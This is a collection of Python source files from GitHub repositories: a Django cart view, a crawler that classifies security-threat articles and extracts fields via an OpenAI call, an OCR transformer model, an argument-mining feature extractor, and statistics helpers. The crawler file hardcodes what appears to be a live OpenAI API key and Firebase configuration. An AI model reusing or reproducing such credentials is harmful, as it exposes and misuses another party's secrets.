request.POST['odeme']\n \n odenen = Sepet.objects.filter(user = request.user)\n print(odenen[0].urun)\n odemeYap = Odeme.objects.create(\n toplamFiyat = odeme,\n user = request.user,\n )\n odemeYap.sepet.add(*odenen)\n \n\n odemeYap.save()\n \n return redirect('payment')\n context = {\n 'urun':urun,\n 'toplam':toplam\n }\n return render(request, 'sepet.html', context)","repo_name":"MervanKoncuk/django-nonreload-cart","sub_path":"urunler/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30907076819","text":"from urllib.parse import urlparse\nimport warnings\nfrom django.shortcuts import render\n\nfrom django.http import JsonResponse\nimport requests\nfrom bs4 import BeautifulSoup\nimport concurrent.futures\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\n\nimport webhdfs\nfrom hdfs import InsecureClient\n\nimport json\n\nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import load_model\n\n\nconfig = {\n \"apiKey\": \"AIzaSyAf4h3WS_PJIY_Q-C_3a1JLlk6YKiD8-yw\",\n \"authDomain\": \"my-project-1-666a4.firebaseapp.com\",\n \"projectId\": \"my-project-1-666a4\",\n \"storageBucket\": \"my-project-1-666a4.appspot.com\",\n \"messagingSenderId\": \"576412656365\",\n \"appId\": \"1:576412656365:web:6a1935b3482dcb61a0a2e4\",\n \"measurementId\": \"G-08HCHNFWXM\"\n}\n\nfirebase_admin.initialize_app(credentials.Certificate(\n r'D:\\Workspace\\RP317\\Vigilance360-Server\\server1\\crawler\\vigilance360-firebase.json'))\n\ndb = firestore.client()\n\n\ndef predict_category_lstm(example_text):\n loaded_lstm_model = load_model(\n 'D:\\\\Workspace\\RP317\\\\Vigilance360-Server\\\\server1\\\\crawler\\\\api\\\\lstm_model.h5')\n\n # Preprocess the example text\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts([example_text])\n example_text_sequence = tokenizer.texts_to_sequences([example_text])\n max_len = 100 # Adjust as needed\n example_text_padded = pad_sequences(example_text_sequence, maxlen=max_len)\n\n # Make predictions\n predictions = loaded_lstm_model.predict(example_text_padded)\n\n # Decode predictions back to labels\n predicted_labels = np.argmax(predictions, axis=1)\n\n # Map labels back to their original categories\n categories = ['hardware', 'software', 'os']\n predicted_category = categories[predicted_labels[0]]\n\n return predicted_category\n\n\ndef extract_features(article, category):\n api_key = \"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\"\n url = \"https://api.openai.com/v1/engines/text-davinci-003/completions\"\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {api_key}\"\n }\n\n prompt = f\"\"\"Extract the following information from the given article\n :Category: ( article about Os, Hardware, Sofware or both) \n Name: should be company + product), \n if Category = os / software: version,\n if Category = hardware: model number, \n Threat Level: (High Risk or Low Risk), \n Components Affected:\n Overview, \n Description, \n Impact, \n Solution,\n Version,\n Reference,\n Disclaimer\n .Details of the Article : {article}\"\"\"\n\n data = {\n \"prompt\": prompt,\n \"max_tokens\": 200\n }\n\n response = requests.post(url, json=data, headers=headers)\n response_json = response.json()\n\n if \"choices\" in response_json and len(response_json[\"choices\"]) > 0:\n extracted_data = response_json[\"choices\"][0][\"text\"]\n\n result = {\"name\": \"\", \"threatLevel\": \"\", \"affected\": \"\", \"overview\": \"\",\n \"description\": \"\", \"impact\": \"\", \"solution\": \"\", \"version\": \"\", \"model\": \"\", \"reference\": \"\", \"disclaimer\": \"\"}\n\n lines = extracted_data.split('\\n')\n for line in lines:\n if line.startswith(\"Name: \"):\n result[\"name\"] = line.replace(\"Name: \", \"\")\n elif line.startswith(\"Threat Level: \"):\n result[\"threatLevel\"] = line.replace(\"Threat Level: \", \"\")\n elif line.startswith(\"Components Affected: \"):\n result[\"affected\"] = line.replace(\n \"Components Affected: \", \"\")\n elif line.startswith(\"Overview: \"):\n result[\"overview\"] = line.replace(\"Overview: \", \"\")\n elif line.startswith(\"Reference: \"):\n result[\"reference\"] = line.replace(\"Reference: \", \"\")\n elif line.startswith(\"Disclaimer: \"):\n result[\"disclaimer\"] = line.replace(\"Disclaimer: \", \"\")\n elif line.startswith(\"Description: \"):\n result[\"description\"] = line.replace(\"Description: \", \"\")\n elif line.startswith(\"Impact: \"):\n result[\"impact\"] = line.replace(\"Impact: \", \"\")\n elif line.startswith(\"Solution: \"):\n result[\"solution\"] = line.replace(\"Solution: \", \"\")\n elif category == \"os\" or category == \"software\":\n if line.startswith(\"Version: \"):\n result[\"version\"] = line.replace(\"Version: \", \"\")\n elif category == \"hardware\":\n if line.startswith(\"Model: \"):\n result[\"model\"] = line.replace(\"Model: \", \"\")\n return result\n\n else:\n return \"Extraction failed.\"\n\n\n__all__ = [\"extract_features\"]\n\n\ndef crawl_page():\n warnings.filterwarnings(\"ignore\", category=UserWarning)\n docs = db.collection('urls').get()\n paragraphs = []\n oses = []\n softwares = []\n hardwares = []\n links = []\n\n with concurrent.futures.ThreadPoolExecutor() as executor:\n futures = []\n for doc in docs:\n document = doc.to_dict()\n url = document['url']\n paragraph = get_paragraphs(url)\n osThreat = getOsThreat(paragraph)\n softwareThreat = getSoftwareThreat(paragraph)\n hardwareThreat = getHardwareThreat(paragraphs)\n if (osThreat != ''):\n oses.append(osThreat)\n if (softwareThreat != ''):\n softwares.append(softwareThreat)\n if (hardwareThreat != ''):\n hardwares.append(hardwareThreat)\n return oses, softwares, hardwares\n\n\ndef get_paragraphs(url):\n response = requests.get(url)\n if response.status_code == 200:\n # Parse the HTML content\n soup = BeautifulSoup(response.content, 'html.parser')\n\n # Find all paragraph elements\n paragraphs = [p.get_text() for p in soup.find_all('p')]\n return paragraphs\n else:\n return []\n\n\ndef getOsThreat(paragraphs):\n category = predict_category_lstm(paragraphs)\n if category == 'os':\n print(category)\n return extract_features(paragraphs, category)\n else:\n return ''\n\n\ndef getSoftwareThreat(paragraphs):\n category = predict_category_lstm(paragraphs)\n if category == 'software':\n print(category)\n return extract_features(paragraphs, category)\n else:\n return ''\n\n\ndef getHardwareThreat(paragraphs):\n category = predict_category_lstm(paragraphs)\n if category == 'hardware':\n print(category)\n return extract_features(paragraphs, category)\n else:\n return ''\n\n\ndef sendDataToHadoop(request):\n oses, softwares, hardwares = crawl_page()\n print(oses)\n print(softwares)\n print(hardwares)\n softwareThreat = softwares\n hardwareThreat = hardwares\n osThreat = oses\n # Convert the list to JSON string\n softwareThreatContent = json.dumps(softwareThreat)\n hardwareThreatContent = json.dumps(hardwareThreat)\n osThreatContent = json.dumps(osThreat)\n\n # Path where you want to store the file in HDFS\n hdfs_software_path = \"/temp/software.json\"\n hdfs_hardware_path = \"/temp/hardware.json\"\n hdfs_os_path = \"/temp/os.json\"\n\n # Establish connection to HDFS using WebHDFS\n # client=webhdfs.API(host='localhost',port='50070')\n client = InsecureClient('http://localhost:50070')\n\n # client.upload(hdfs_file_path, local_file_path,overwrite=True)\n with client.write(hdfs_software_path, overwrite=True) as hdfs_file:\n hdfs_file.write(softwareThreatContent)\n\n with client.write(hdfs_hardware_path, overwrite=True) as hdfs_file:\n hdfs_file.write(hardwareThreatContent)\n\n with client.write(hdfs_os_path, overwrite=True) as hdfs_file:\n hdfs_file.write(osThreatContent)\n\n return HttpResponse(status=200)\n","repo_name":"linuka00/Vigilance360","sub_path":"Vigilance360-Server/server1/crawler/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14769801786","text":"__author__ = 'ericshape'\n\nimport json\nfrom pprint import pprint\n\noutputFileName = 'graphEdges.json'\nfOutputFile = open(outputFileName,'w')\n\ni = 0\nwith open(\"user_info_complete_merged-0412_10\") as f:\n for line in f:\n requestData = json.loads(line)\n pprint(requestData, fOutputFile)\n\n # followerGroup = requestData['followers']\n # if followerGroup != [] and i < 100:\n # i +=1\n # friend = requestData['id']\n # for follower in followerGroup:\n # print >> fOutputFile, friend, ';' , follower\n","repo_name":"explorer-wei/unsupervised-event-extraction-from-news-and-twitter","sub_path":"Codes/twitter416/MergeGraph/ParseGraph.py","file_name":"ParseGraph.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15585127412","text":"from typing import List, Optional, Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom ocrstack.config.config import Config\nfrom ocrstack.data.collate import Batch\nfrom torch import Tensor\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nfrom resnet import resnet34\n\n\nclass TransformerDecoderAdapter(nn.Module):\n\n '''\n This class adapts `nn.TransformerDecoder` class to the stack\n '''\n\n def __init__(self):\n super(TransformerDecoderAdapter, self).__init__()\n self.in_embed, self.out_embed = self.build_embedding()\n self.decoder = nn.TransformerDecoder(nn.TransformerDecoderLayer(128, 8), 1)\n self.sos_idx = 0\n self.eos_idx = 1\n\n def build_embedding(self) -> Tuple[nn.Module, nn.Module]:\n out_embed = nn.Linear(128, 114, bias=False)\n in_embed = nn.Embedding(114, 128, 2,_weight=out_embed.weight)\n return in_embed, out_embed\n\n def forward(self, memory, tgt, memory_key_padding_mask=None, tgt_key_padding_mask=None):\n # type: (Tensor, Tensor, Optional[Tensor], Optional[Tensor]) -> Tensor\n '''\n Arguments:\n ----------\n - memory: (B, S, E)\n - tgt: (B, T)\n\n Returns:\n --------\n - logits: (B, T, V)\n '''\n # Since transformer components working with time-first tensor, we should transpose the shape first\n tgt = self.in_embed(tgt) # [B, T, E]\n tgt = tgt.transpose(0, 1) # [T, B, E]\n\n memory = memory.transpose(0, 1) # [S, B, E]\n tgt_mask = generate_square_subsequent_mask(tgt.size(0)).to(memory.device)\n memory_mask = None\n output = self.decoder(tgt, memory, tgt_mask, memory_mask, tgt_key_padding_mask, memory_key_padding_mask)\n output = output.transpose(0, 1) # [B, T, E]\n output = self.out_embed(output) # [B, T, V]\n return output\n\n @torch.jit.export\n def decode(self, memory, max_length, memory_key_padding_mask=None):\n # type: (Tensor, int, Optional[Tensor]) -> Tensor\n batch_size = memory.size(0)\n inputs = torch.empty(batch_size, 1, dtype=torch.long, device=memory.device).fill_(self.sos_idx)\n outputs: List[Tensor] = [\n F.one_hot(inputs, num_classes=self.in_embed.num_embeddings).float().to(inputs.device)\n ]\n end_flag = torch.zeros(batch_size, dtype=torch.bool)\n for _ in range(max_length):\n text = self.forward(memory, inputs, memory_key_padding_mask, None) # [B, T, V]\n output = F.softmax(text[:, [-1]], dim=-1) # [B, 1, V]\n outputs.append(output) # [[B, 1, V]]\n output = output.argmax(-1, keepdim=False) # [B, 1]\n inputs = torch.cat((inputs, output), dim=1) # [B, T + 1]\n\n # set flag for early break\n output = output.squeeze(1) # [B]\n current_end = output == self.eos_idx # [B]\n current_end = current_end.cpu()\n end_flag |= current_end\n if end_flag.all():\n break\n\n return torch.cat(outputs, dim=1) # [B, T, V]\n\n\nclass GeneralizedConvSeq2Seq(nn.Module):\n\n def __init__(self):\n # type: (Config,) -> None\n super().__init__()\n self.backbone = resnet34(pretrained=False, num_layers=2)\n self.decoder = TransformerDecoderAdapter()\n self.max_length = 150\n\n def freeze(self):\n for param in self.parameters():\n param.requires_grad_(False)\n\n def predict(self, batch: Batch):\n predicts = self.forward(batch.images)\n return predicts\n\n def train_batch(self, batch: Batch):\n logits = self.forward(batch.images, batch.text, batch.lengths)\n return logits\n\n def compute_loss(self, logits, targets, lengths):\n packed_predicts = pack_padded_sequence(logits, lengths, batch_first=True)[0]\n packed_targets = pack_padded_sequence(targets, lengths, batch_first=True)[0]\n loss = F.cross_entropy(packed_predicts, packed_targets)\n return loss\n\n def example_inputs(self):\n return (torch.rand(1, 3, 64, 256), )\n\n def forward(self, images, text=None, lengths=None, image_padding_mask=None):\n # type: (Tensor, Optional[Tensor], Optional[Tensor], Optional[Tensor]) -> Tensor\n images = self.backbone(images) # B, C, H, W\n\n B, E, H, W = images.shape\n images = images.reshape(B, E, H * W) # B, E, H * W\n images = images.transpose(-2, -1) # B, S = H * W, E\n\n if image_padding_mask is not None:\n image_padding_mask = image_padding_mask.reshape(B, H * W)\n\n if self.training:\n return self._forward_training(images, text, lengths, image_padding_mask)\n else:\n return self._forward_eval(images, image_padding_mask)\n\n @torch.jit.unused\n def _forward_training(self, images, text=None, lengths=None, image_padding_mask=None):\n # type: (Tensor, Optional[Tensor], Optional[Tensor], Optional[Tensor]) -> Tensor\n text_padding_mask = generate_padding_mask_from_lengths(lengths - 1).to(images.device) # B, S\n logits = self.decoder(images, text[:, :-1],\n memory_key_padding_mask=image_padding_mask,\n tgt_key_padding_mask=text_padding_mask)\n loss = self.compute_loss(logits, text[:, 1:], lengths - 1)\n return loss\n\n def _forward_eval(self, images, image_padding_mask=None):\n # type: (Tensor, Optional[Tensor]) -> Tensor\n predicts = self.decoder.decode(images, self.max_length, image_padding_mask)\n return predicts\n\n\ndef generate_square_subsequent_mask(sz: int) -> torch.Tensor:\n r\"\"\"Generate a square mask for the sequence. The masked positions are filled with float('-inf').\n Unmasked positions are filled with float(0.0).\n \"\"\"\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n\ndef generate_padding_mask_from_lengths(lengths: torch.Tensor) -> torch.Tensor:\n B, S = len(lengths), lengths.max()\n padding_mask = torch.arange(0, S, device=lengths.device).expand(B, S) >= lengths.unsqueeze(-1)\n return padding_mask\n","repo_name":"VinhLoiIT/pytorch-load-weight","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14005206950","text":"def add_submission_func(exams: dict, users: dict, user: str, lang: str, score: str):\n current_score = int(score)\n if lang in exams.keys():\n exams[lang] += 1\n else:\n exams[lang] = 1\n if user in users.keys():\n if users[user] < current_score:\n users[user] = current_score\n else:\n users[user] = current_score\n return exams, users\n\n\ndef ban_participant_func(users: dict, user: str):\n if user in users.keys():\n users.pop(user)\n return users\n\n\ndef get_exam_result_func(exams: dict, users: dict):\n return f'Results:\\n' + '\\n'.join([f'{k} | {v}' for k, v in users.items()]) + \\\n '\\nSubmissions:\\n' + '\\n'.join([f'{k} - {v}' for k, v in exams.items()])\n\n\nexam_submissions = {}\nuser_submissions = {}\n\ninput_line = input()\nwhile input_line != 'exam finished':\n if 'banned' in input_line:\n command = input_line.split('-')\n username = command[0]\n user_submissions = ban_participant_func(user_submissions, username)\n else:\n username, language, points = input_line.split('-')\n exam_submissions, user_submissions = add_submission_func(exam_submissions, user_submissions, username, language,\n points)\n input_line = input()\nprint(get_exam_result_func(exam_submissions, user_submissions))\n","repo_name":"mi6oo6im/my_python_training","sub_path":"fundamentals/exercise_dictionaries/soft_uni_exam_results.py","file_name":"soft_uni_exam_results.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"20724783982","text":"from pos import pos\nimport json\nfrom collections import defaultdict, Counter\nfrom math import log\nDISCOURSE_RELATIONS = [\"Comparison\",\"Contingency\",\"Expansion\",\"Temporal\"]\nINDICATOR_TYPES = [\"forward\",\"backwards\",\"thesis\",\"rebuttal\"]\n\nclass ArgumentRelationIdentification(): \n def __init__(self, essay_name, components, relation_prob_file,lemma_file,relation_info_file=None): \n self.components = components\n self.is_training_data = False \n if relation_info_file is not None: \n self.idx_to_name = []\n self.is_training_data = True \n with open(relation_info_file) as file: \n info = json.load(file)\n self.position_to_name = {v:k for k,v in info[essay_name][\"idx_to_start\"].items()}\n self.relations = info[essay_name][\"outgoing_relations\"] \n for c in self.components: \n name = self.position_to_name[c[\"start\"]]\n self.idx_to_name.append(name) \n with open(relation_prob_file) as file: \n info = json.load(file)\n self.p_outgoing = info[\"outgoing\"]\n self.p_incoming = info[\"incoming\"]\n with open(lemma_file) as file: \n info = json.load(file)\n self.num_all_lemmas = info[\"num_all_lemmas\"]\n self.lemmas_incoming = info[\"lemmas_incoming\"]\n self.lemmas_outgoing = info[\"lemmas_outgoing\"]\n \n self.get_pointwise_mutual_info()\n self.get_production_rules()\n self.pairwise_features()\n \n def get_pointwise_mutual_info(self): \n # get PMI(t,d) for each token t and direction d \n for c in self.components: \n c[\"pmi_incoming\"] = []\n c[\"pmi_outgoing\"] = []\n for idx,prob in enumerate(c[\"p_token\"]):\n lemma = c[\"component_lemmas\"][idx]\n if lemma in self.lemmas_incoming and prob > 0: \n p_t_in = self.lemmas_incoming[lemma] / self.num_all_lemmas\n c[f\"pmi_incoming\"].append( log( p_t_in / (prob * self.p_incoming)) )\n else: \n c[f\"pmi_incoming\"].append(0)\n if lemma in self.lemmas_outgoing and prob > 0: \n p_t_out = self.lemmas_outgoing[lemma] / self.num_all_lemmas\n c[f\"pmi_outgoing\"].append( log( p_t_out / (prob * self.p_outgoing)) )\n else: \n c[f\"pmi_outgoing\"].append(0)\n \n # for c in self.components: \n # print(c[\"pmi_incoming\"],c[\"pmi_outgoing\"])\n\n\n def get_production_rules(self): \n production_rules = []\n for c in self.components: \n for rule in c[\"production_rules\"]: \n production_rules.append(f\"{rule}\")\n self.production_rules_500_most_common = Counter(production_rules).most_common(n=500)\n \n def pairwise_features(self): \n # key will be (i,j) where i is the idx of a source and j is the idx of a target \n self.pairwise = {} \n\n self.components_per_paragraph = defaultdict(list)\n idx_in_paragraph = 0 # variable to indicate the position of the component in a paragraph (e.g. idx 0 out of 4 components in the paragraph)\n for idx in range(len(self.components)): \n p_idx = self.components[idx][\"paragraph\"]\n idx_in_paragraph += 1 \n if p_idx not in self.components_per_paragraph:\n idx_in_paragraph = 0 \n self.components[idx][\"idx_in_paragraph\"] = idx_in_paragraph\n self.components_per_paragraph[p_idx].append(idx)\n\n for i, source in enumerate(self.components):\n for j, target in enumerate(self.components):\n # the source cannot equal the target \n if i == j: continue\n # the components must be in the same paragraph! \n if source[\"paragraph\"] != target[\"paragraph\"]: \n continue \n \n self.pairwise[f\"{i+1},{j+1}\"] = {\n # there is actually a directed edge from source to target \n \"is_a_relation\": 0, # default is false \n # number of tokens in both source and target \n \"num_tokens\": len(source[\"component\"]) + len(target[\"component\"]),\n # if source and target are present in the same sentence\n \"same_sentence\": 0, # default is false \n # if target present before source \n \"target_before_source\": 0, # default is false,\n # if pair is present in intro or conclusion. They are both in the same paragraph\n \"intro_or_conc\": source[\"intro/conc\"],\n # number of components between source and target\n \"num_between\": abs(source[\"idx_in_paragraph\"]-target[\"idx_in_paragraph\"])-1, \n # number of components in the covering paragraph \n \"num_in_paragraph\": len(self.components_per_paragraph[source[\"paragraph\"]]),\n # if target and source share at least one noun \n \"share_noun\": 0, # default is false \n # the number of nouns shared by target and source \n \"num_shared_nouns\":0, # default is none \n # source or target is first or last in paragraph \n \"first_or_last\": 0 # default is none \n }\n \n if self.is_training_data: \n if self.idx_to_name[j] in self.relations[self.idx_to_name[i]]: \n # print(self.idx_to_name[i], self.idx_to_name[j])\n # print(f\"{i+1},{j+1}\")\n self.pairwise[f\"{i+1},{j+1}\"][\"is_a_relation\"] = 1 \n\n self.pairwise[f\"{i+1},{j+1}\"].update(self.get_indicator_info(source,target))\n \n # get binary POS distribution with the POS distribution of the target \n for pos_type in pos.keys():\n self.pairwise[f\"{i+1},{j+1}\"][pos_type] = source[pos_type] + target[pos_type]\n\n # source and target are present in the same sentence\n if source[\"sentence\"] == target[\"sentence\"]: \n self.pairwise[f\"{i+1},{j+1}\"][\"same_sentence\"] = 1 # true \n \n # target is present before source \n if source[\"start\"] > target[\"start\"]: \n self.pairwise[f\"{i+1},{j+1}\"][\"target_before_source\"] = 1 # true \n \n # if target and source are first or last component in paragraph \n if source[\"first/last\"] or target[\"first/last\"]: \n self.pairwise[f\"{i+1},{j+1}\"][\"first_or_last\"] = 1 \n \n # find shared nouns (both binary and number)\n shared_nouns = []\n for idx, lemma in enumerate(source[\"component_lemmas\"]):\n if \"NN\" in source[\"component_pos\"][idx]: \n if lemma in target[\"component_lemmas\"]:\n shared_nouns.append(lemma)\n if len(shared_nouns) > 0: \n self.pairwise[f\"{i+1},{j+1}\"][\"share_noun\"] = 1\n self.pairwise[f\"{i+1},{j+1}\"][\"num_shared_nouns\"] = len(shared_nouns)\n\n # count how many times a production rule is shared by source and target \n self.pairwise[f\"{i+1},{j+1}\"].update(self.shared_production_rules(source,target))\n \n # get binary discourse triples of source and target \n self.pairwise[f\"{i+1},{j+1}\"].update(self.get_discourse_triples(source,target))\n\n # get pmi features \n self.pairwise[f\"{i+1},{j+1}\"].update(self.get_pmi_features(source,target))\n # get binary representation of the types of indicators that occur in and around \n # components between source and target \n self.get_indicators_between()\n\n # print for testing purposes \n # for pair,info in self.pairwise.items(): \n # # if pair[0] > 1: break\n # if info[\"is_a_relation\"]: \n # print(f\"{self.idx_to_name[pair[0]]} to {self.idx_to_name[pair[1]]}: {info}\\n\")\n # break\n \n def get_indicator_info(self,source,target):\n info = {}\n for type in INDICATOR_TYPES: \n component_key = f\"component_{type}_indicators\"\n if source[component_key] == 1 or target[component_key] == 1: \n # this indicator type is present in source or target \n info[component_key] = 1 \n else: \n # this indicator type is not present in source or target \n info[component_key] = 0 \n for context in [\"preceding\",\"following\"]: \n context_key = f\"{context}_{type}_indicators\"\n if source[context_key] == 1 or target[context_key] == 1:\n # this indicator type is present in the context of either source or target \n info[f\"context_{type}_indicators\"] = 1 \n else: \n # this indicator type is not present in the context of either source or target \n info[f\"context_{type}_indicators\"] = 0 \n return info\n\n def get_indicators_between(self):\n for pair in self.pairwise.keys(): \n s,t = int(pair.split(\",\")[0])-1, int(pair.split(\",\")[1])-1\n p_idx = self.components[s][\"paragraph\"]\n for type in INDICATOR_TYPES: \n key = f\"{type}_indicators\"\n self.pairwise[pair][f\"between_{key}\"] = 0\n \n for c in self.components_per_paragraph[p_idx]: \n # find a component that is between source and target \n # check if any of the four types of indicators occur in this component or its context \n if min(s,t) < c < max(s,t):\n for type in INDICATOR_TYPES: \n for location in [\"component\",\"preceding\",\"following\"]: \n key = f\"{type}_indicators\"\n if self.components[c][f\"{location}_{key}\"] == 1: \n self.pairwise[pair][f\"between_{key}\"] = 1 \n\n def shared_production_rules(self,source,target): \n info = { rule: 0 for rule, freq in self.production_rules_500_most_common}\n for rule in source[\"production_rules\"]: \n if rule in target[\"production_rules\"]: \n info[f\"{rule}\"] += 1 \n return info \n \n def get_discourse_triples(self,source,target): \n info = {}\n for relation in DISCOURSE_RELATIONS: \n for arg in [\"Arg1\",\"Arg2\"]:\n for type in [\"Explicit\",\"Implicit\"]: \n key = f\"{relation}_{arg}_{type}\"\n info[key] = source[key] + target[key]\n return info\n \n def get_pmi_features(self,source,target): \n info = {\n \"presence_positive_associations\":0, # default is false \n \"presence_negative_associations\":0, # default is false \n } \n positive, negative = 0,0 \n total = len(source[\"component_lemmas\"]) + len(target[\"component_lemmas\"])\n for direction in [\"incoming\",\"outgoing\"]: \n for lemma_pmi in source[f\"pmi_{direction}\"]: \n if lemma_pmi > 0: \n positive += 1 \n elif lemma_pmi < 0: \n negative += 1 \n info[\"ratio_positive_associations\"] = positive / total\n info[\"ratio_negative_associations\"] = negative / total \n if positive > 0: \n info[\"presence_positive_associations\"] = 1 \n if negative > 0: \n info[\"presence_negative_associations\"] = 1 \n return info\n\n# if __name__=='__main__':\n\n# essay_names = []\n# with open(f\"CS333AES/stab/assets/train_text.txt\",\"r\") as file: \n# for line in file.readlines(): \n# essay_names.append(line.split(\"-final/\")[1].strip(\"\\n\"))\n\n# for essay_name in essay_names: \n# # read component data for this essay \n# with open(f'CS333AES/stab/outputs/classification/{essay_name}.json') as file: \n# components = json.load(file)\n# # relation information for each essay \n# relation_info_file = \"CS333AES/stab/models/argument_relation_info.json\"\n# # relation probabilities \n# relation_prob_file = \"CS333AES/stab/models/relation_probabilities.json\"\n# # lemma information for components of training data \n# lemma_file = \"CS333AES/stab/models/training_data_lemmas.json\"\n# # run argument relation features extraction \n# argrelation = ArgumentRelationIdentification(essay_name, components,relation_prob_file,lemma_file,relation_info_file)\n# with open(f\"CS333AES/stab/outputs/relations/{essay_name}.json\", \"w\") as file:\n# json.dump(argrelation.pairwise, file)\n# print(essay_name)\n","repo_name":"KevinPHX/CS333AES","sub_path":"stab/lib/argument_relations.py","file_name":"argument_relations.py","file_ext":"py","file_size_in_byte":13096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"19450374887","text":"#-*- coding: UTF-8 -*-\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score\nfrom sklearn.model_selection import train_test_split\n\nimport datetime\nfrom functools import reduce\nimport re\nimport textwrap\nimport seaborn as seabornInstance\nimport matplotlib.pyplot as plt\n\nimport statsmodels.api as sm\nfrom statsmodels.iolib import summary,table\nfrom statsmodels.iolib.table import SimpleTable\nfrom statsmodels.iolib.tableformatting import fmt_latex, fmt_txt\nfrom statsmodels.iolib.summary2 import _make_unique,_col_info,summary_params,Summary\nfrom statsmodels.compat.python import lzip\n\nimport docx\nfrom docx.shared import Inches,Cm,Pt\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\nfrom docx.enum.table import WD_TABLE_ALIGNMENT\n\nimport sys, dateutil.parser, time, math, requests, re, json, os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime as dt\nfrom collections import defaultdict\nfrom bson import json_util\nfrom bson.json_util import loads\n\n#資料處理轉換\nclass NpEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return super(NpEncoder, self).default(obj)\n\ndef stdtime(daytime):\n get=dateutil.parser.parse(daytime)\n return get\n\n# 2021.3.17 Lin修改interval,intervals\ndef interval(start_time,end_time,freq):\n data = pd.date_range(start=start_time,end=end_time,freq=freq)\n data = pd.DataFrame(data,columns=['stdtime'])\n data[freq]=1\n return data\n\ndef intervals(start_time,end_time,freq_list):\n data = pd.date_range(start=start_time,end=end_time,freq=\"1s\")\n data = pd.DataFrame(data,columns=['stdtime'])\n for sec in freq_list:\n final = data[[\"stdtime\"]].set_index(\"stdtime\").resample(sec,origin=\"start\").ffill().reset_index().rename(columns={\"index\":\"stdtime\"})\n final[sec]=1\n data = pd.merge(data,final,on=\"stdtime\",how=\"left\")\n data[sec] = data[sec].fillna(0).astype(int)\n return data\n\ndef lag(title,phase,data):\n for p in phase:\n df=data[title].shift(p)\n for t in title:\n df.rename(columns={t:\"lag\"+str(p)+\"_\"+t},inplace=True)\n data = pd.concat([data,df],axis=1)\n data = data.dropna().reset_index(drop=True)\n return data\n\n#計算敘述統計\ndef status(data):\n data = pd.DataFrame([data.sum(),data.count(),data.min(),data.idxmin(),data.quantile(.25),data.median(),\n data.quantile(.75),data.mean(),data.max(),data.idxmax(),data.mad(),data.var(),\n data.std(),data.skew(),data.kurt()],index=['加總','總数','最小值','最小值位置','25%分位数',\n '中位数','75%分位数','均值','最大值','最大值位数','平均絕對偏差','方差','標準差','偏度','峰度'])\n return data\n\n\n# 21.03.30 Cao 新增 OLS回归def\n# 回归OLS部分 _col_params()和summary_col()函数共同使用\n\n# %f ——保留小数点后面六位有效数字,%.3f,保留3位小数位\n# %e ——保留小数点后面六位有效数字,指数形式输出,%.3e,保留3位小数位,使用科学计数法\n# %g ——在保证六位有效数字的前提下,使用小数方式,否则使用科学计数法,%.3g,保留3位有效数字,使用小数或科学计数法\ndef _col_params(result, \n float_format_t='%.4f',\n float_format_coef='%.2f',\n float_format_adjr='%.2f',\n stars=True):\n\n # Extract parameters\n res = summary_params(result)\n # Format float\n res['Coef.'] = res['Coef.'].apply(lambda x: float_format_coef % x)\n res['t'] = res['t'].apply(lambda x: float_format_t % x)\n# for col in res.columns[:3]:\n# res[col] = res[col].apply(lambda x: float_format % x)\n # Std.Errors in parentheses\n res.iloc[:, 2] = '(' + res.iloc[:, 2] + ')'\n # Significance stars\n if stars:\n idx = res.iloc[:, 3] < .1\n res.loc[idx, res.columns[0]] = res.loc[idx, res.columns[0]] + '*'\n idx = res.iloc[:, 3] < .05\n res.loc[idx, res.columns[0]] = res.loc[idx, res.columns[0]] + '*'\n idx = res.iloc[:, 3] < .01\n res.loc[idx, res.columns[0]] = res.loc[idx, res.columns[0]] + '*'\n # Stack Coefs and Std.Errors\n res = res.iloc[:, [0,2]]\n res = res.stack()\n rsquared = getattr(result, 'rsquared', np.nan)\n rsquared_adj = getattr(result, 'rsquared_adj', np.nan)\n r2 = pd.Series({('R-squared', \"\"): rsquared,\n ('R-squared Adj.', \"\"): rsquared_adj})\n\n if r2.notnull().any():\n r2 = r2.apply(lambda x: float_format_adjr % x)\n res = pd.concat([res, r2], axis=0)\n res = pd.DataFrame(res)\n res.columns = [str(result.model.endog_names)]\n return res\n\n\n\ndef summary_col(results,\n float_format_t='%.4f',\n float_format_coef='%.2f',\n float_format_adjr='%.2f',\n model_names=(),\n stars=False,\n info_dict=None, regressor_order=(), drop_omitted=False):\n # sample\n # y = df['nft']\n # x = df[['epm',\"volt\",\"lnvol\",\"relative_spread\"]] \n # x1 = sm.add_constant(x)\n # est = sm.OLS(y, x1).fit()\n # a = 